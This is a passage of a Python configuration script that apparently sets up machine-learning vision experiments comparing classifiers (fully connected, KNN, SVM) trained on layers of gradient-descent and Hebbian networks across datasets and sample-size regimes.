svm_on_hebb_layer_ft = {}
gdes_fc_on_vae_layer = {}
gdes_fc_on_vae_layer_ft = {}
hebb_fc_on_vae_layer = {}
hebb_fc_on_vae_layer_ft = {}
prec_on_vae_layer_ft = {}
knn_on_vae_layer = {}
knn_on_vae_layer_ft = {}
svm_on_vae_layer = {}
svm_on_vae_layer_ft = {}
for ds in datasets:
for da in [False, True]:
for n in smpleff_regimes[ds]:
config_base_gdes[ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.model_' + str(num_layers[ds]) + 'l.Net',
P.KEY_NET_OUTPUTS: net_outputs[ds],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
}
for l in range(1, num_layers[ds]):
gdes_fc_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: 5e-4,
P.KEY_DROPOUT_P: 0.5,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net', 'models.gdes.fc.Net'],
P.KEY_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds+ '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_NET_OUTPUTS: ['bn' + str(l), 'fc'],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
}
hebb_fc_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
hebb_fc_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_gdes_layer[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/config_base_gdes[' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
svm_on_gdes_layer_ft[str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.SVMClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_gdes_layer_ft[' + str(l) + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
for lrn_rule in lrn_rules:
gdes_fc_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.gdes.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: 5e-4,
P.KEY_DROPOUT_P: 0.5,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
gdes_fc_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net', 'models.gdes.fc.Net'],
P.KEY_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_NET_OUTPUTS: ['bn' + str(l), 'fc'],
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_BATCHSIZE: 64,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_NUM_EPOCHS: 20 if not da else 40,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_SCHED_MANAGER: 'neurolab.optimization.sched.MultiStepSchedManager',
P.KEY_LOSS_METRIC_MANAGER: 'neurolab.optimization.metric.CrossEntMetricManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LR_DECAY: 0.5 if not da else 0.1,
P.KEY_MILESTONES: range(10, 20) if not da else [20, 30],
P.KEY_MOMENTUM: 0.9,
P.KEY_L2_PENALTY: l2_penalties[ds],
P.KEY_DROPOUT_P: 0.5,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_ALPHA: 0.,
}
hebb_fc_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
hebb_fc_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'models.hebb.fc.Net',
P.KEY_NET_OUTPUTS: 'fc',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 20,
P.KEY_OPTIM_MANAGER: 'neurolab.optimization.optim.SGDOptimManager',
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_LEARNING_RATE: 1e-3,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
prec_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_WHITEN: None if lrn_rule != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds],
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1,
P.KEY_CRIT_METRIC_MANAGER: 'neurolab.optimization.metric.PrecMetricManager',
P.KEY_SKCLF_NUM_SAMPLES: tot_trn_samples[ds],
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: samples_per_class[ds],
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.gdes.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/smpleff/gdes_fc_on_hebb_layer_ft[' + str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_hebb_layer[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
P.KEY_NET_OUTPUTS: 'clf',
P.KEY_DATA_MANAGER: 'neurolab.data.' + data_managers[ds],
P.KEY_AUGMENT_MANAGER: None if not da else 'neurolab.data.LightCustomAugmentManager',
P.KEY_AUGM_BEFORE_STATS: True,
P.KEY_AUGM_STAT_PASSES: 2,
P.KEY_WHITEN: None if lrn_rule_keys[lrn_rule] != 'hwta' else 2,
P.KEY_TOT_TRN_SAMPLES: tot_trn_samples[ds], P.KEY_NUM_TRN_SAMPLES: n,
P.KEY_INPUT_SHAPE: input_shapes[ds],
P.KEY_BATCHSIZE: 64,
P.KEY_NUM_EPOCHS: 1 if not da else 2,
P.KEY_CRIT_METRIC_MANAGER: ['neurolab.optimization.metric.TopKAccMetricManager', 'neurolab.optimization.metric.TopKAccMetricManager'],
P.KEY_TOPKACC_K: [1, 5],
P.KEY_SKCLF_NUM_SAMPLES: n if not da else 2*n,
P.KEY_NYSTROEM_N_COMPONENTS: 100,
P.KEY_KNN_N_NEIGHBORS: 10,
P.KEY_LOCAL_LRN_RULE: lrn_rule_keys[lrn_rule],
PP.KEY_WTA_K: lrn_rule_k[lrn_rule],
P.KEY_PRE_NET_MODULES: ['models.hebb.model_' + str(num_layers[ds]) + 'l.Net'],
P.KEY_PRE_NET_MDL_PATHS: [P.PROJECT_ROOT + '/results/configs/vision/hebb/config_base_hebb[' + lrn_rule + '_' + ds + ('_da' if da else '') + ']/iter_' + P.STR_TOKEN + '/model0.pt'],
P.KEY_PRE_NET_OUTPUTS: ['bn' + str(l)],
}
knn_on_hebb_layer_ft[str(l) + '_' + lrn_rule + '_' + ds + '_' + str(n) + ('_da' if da else '')] = {
P.KEY_EXPERIMENT: 'neurolab.experiment.VisionExperiment',
P.KEY_NET_MODULES: 'neurolab.model.skclassif.KNNClassifier',
